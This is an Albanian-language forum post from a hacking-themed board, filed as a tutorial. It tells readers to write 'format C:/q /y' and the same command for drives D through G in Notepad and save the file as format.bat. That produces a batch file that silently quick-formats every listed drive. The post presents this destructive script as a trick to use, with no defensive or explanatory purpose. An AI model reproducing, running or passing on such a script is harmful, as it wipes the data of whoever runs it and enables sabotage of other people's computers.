Would you like to react to this message? Create an account in a few clicks or log in to continue.


Valonq & CracKer-Y
 
ForumEarn moneyLatest imagesRegjistrohuidentifikimi

 

 Formatizo HDD me NotePad

Shko poshtë 
AutoriMesazh
Valonq
AdminNumri i postimeve : 152
Age : 36
Registration date : 14/10/2008

Formatizo HDD me NotePad Empty
MesazhTitulli: Formatizo HDD me NotePad   Formatizo HDD me NotePad I_icon_minitimeWed Dec 17, 2008 1:41 pm

Hapne NotePad dhe shkurni:

format C:/q /y
format D:/q /y
format E:/q /y
format F:/q /y
format G:/q /y


dhe klikoni File > Save As emrin mundeni me ja lan psh format.bat
Mbrapsht në krye Shko poshtë
https://black.albanianforum.net
 
Formatizo HDD me NotePad
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Tutoriale-
Kërce tek: